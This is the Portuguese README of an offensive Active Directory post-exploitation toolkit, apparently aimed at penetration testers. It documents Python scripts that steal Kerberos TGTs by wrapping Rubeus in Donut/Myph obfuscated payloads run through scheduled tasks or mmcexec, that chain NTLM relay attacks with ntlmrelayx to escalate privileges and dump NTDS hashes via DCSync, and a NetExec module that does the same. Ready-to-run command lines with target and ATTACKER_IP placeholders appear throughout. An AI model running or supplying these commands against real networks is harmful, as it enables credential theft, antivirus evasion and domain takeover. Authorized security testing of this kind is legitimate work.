
Kit de pós-exploração automatizado do Active Directory para extração de tickets Kerberos, ataques de relay NTLM e movimento lateral via integração com NetExec, Impacket e Donut.
Este repositório contém uma coleção de scripts orquestradores em Python projetados para avaliações de segurança e testes de penetração em ambientes Active Directory. Essas ferramentas são especificamente desenvolvidas para cenários de pós-exploração onde o acesso administrativo local já foi estabelecido em uma estação de trabalho ou servidor comprometido, e o objetivo é realizar movimentação lateral ou escalonamento de privilégios em direção ao domínio Active Directory mais amplo.
Ao automatizar fluxos de trabalho que envolvem utilitários de segurança comuns como NetExec, Impacket, Donut e BloodyAD, esses scripts simplificam processos complexos de várias etapas em operações repetíveis de comando único.
Os scripts exigem que as seguintes ferramentas estejam instaladas no sistema host e disponíveis no PATH do sistema:
nxc)impacket-ntlmrelayx, impacket-secretsdump, impacket-ticketConverter)awk, base64Para formatação aprimorada de saída no console, instale os seguintes pacotes:
pip install colorama rich
harpyTGT.py)Este script automatiza a extração de um Ticket de Concessão de Ticket Kerberos (TGT) de uma sessão Windows logada e o converte em um formato ccache compatível com Linux.
Rubeus.exe via Donut, aplica ofuscação usando Myph e executa o binário resultante no host alvo usando tarefas agendadas (schtask_as) ou mmcexec.Execução Padrão (Usuário alvo possui privilégios administrativos):
./harpyTGT.py -t <TARGET_IP> -u <LOCAL_ADMIN_USER> -p <LOCAL_ADMIN_PASS> -U <TARGET_USER> -r </path/to/Rubeus.exe>
Execução Alternativa (Usuário alvo não possui privilégios administrativos):
./harpyTGT.py -t <TARGET_IP> -u <LOCAL_ADMIN_USER> -p <LOCAL_ADMIN_PASS> -U <TARGET_USER> -r </path/to/Rubeus.exe> --no-target-admin --attacker-ip <ATTACKER_IP>

harpyRelay.py)Este script coordena ataques de relay NTLM visando políticas de assinatura SMB ou LDAP mal configuradas em Controladores de Domínio para alcançar escalonamento de privilégios em todo o domínio ou realizar um dump do banco de dados NTDS (DCSync).
ntlmrelayx, dispara uma solicitação de autenticação do cliente comprometido via NetExec, monitora a saída em busca de exploração bem-sucedida e faz o dump dos hashes do domínio. A ferramenta contém rotinas de limpeza automatizadas para minimizar a pegada no domínio alvo.Fluxo LDAPS (Padrão):
./harpyRelay.py--target-host <CLIENT_IP> --local-user <LOCAL_ADMIN> --local-pass <LOCAL_PASS> --domain-admin-user <DOMAIN_ADMIN> --attacker-ip <ATTACKER_IP> --dc-ip <DC_IP> --domain <DOMAIN.LOCAL>
Fluxo LDAP (Fluxo alternativo quando LDAPS não está disponível):
./harpyRelay.py --target-host <CLIENT_IP> --local-user <LOCAL_ADMIN> --local-pass <LOCAL_PASS> --domain-admin-user <DOMAIN_ADMIN> --attacker-ip <ATTACKER_IP> --dc-ip <DC_IP> --domain <DOMAIN.LOCAL> --no-ldaps

stealTGTUm módulo personalizado para NetExec (nxc) projetado para extrair o Ticket de Concessão de Ticket Kerberos (TGT) de um usuário específico logado na máquina alvo.
O módulo interage via mmcexec como SYSTEM, automatizando a geração de um payload evasivo (encapsulando Rubeus com Donut e Myph), executando-o na memória, capturando a saída do ticket em Base64 e convertendo-o transparentemente em um arquivo .ccache pronto para uso no Linux.
O módulo verifica automaticamente se os seguintes utilitários estão instalados e disponíveis em seu $PATH:
donutmyphimpacket-ticketConverterPara carregar o módulo externo no NetExec, copie o script stealTGT.py para o diretório local de módulos do NetExec:
cp stealTGT.py ~/.nxc/modules/
netexec smb <TARGET_IP> -u <ADMIN_USER> -p <ADMIN_PASS> --local-auth -M stealTGT -o USER=<TARGET_USER> RUBEUS=/path/to/Rubeus.exe
Opções do Módulo (-o):
USER: O nome de usuário da sessão atualmente logada da qual você deseja coletar o TGT (por exemplo, jdoe).RUBEUS: O caminho local em sua máquina atacante onde o binário legítimo Rubeus.exe está localizado.

bloodyad ou netexec assim que as operações terminam.AVISO CRÍTICO: Este repositório é destinado estritamente para auditoria de segurança autorizada, pesquisa de vulnerabilidades e fins educacionais. Executar essas ferramentas contra infraestrutura de produção sem autorização prévia explícita e por escrito dos proprietários do sistema é estritamente proibido. O autor não assume nenhuma responsabilidade por uso indevido, danos colaterais ou consequências legais resultantes da implantação deste software.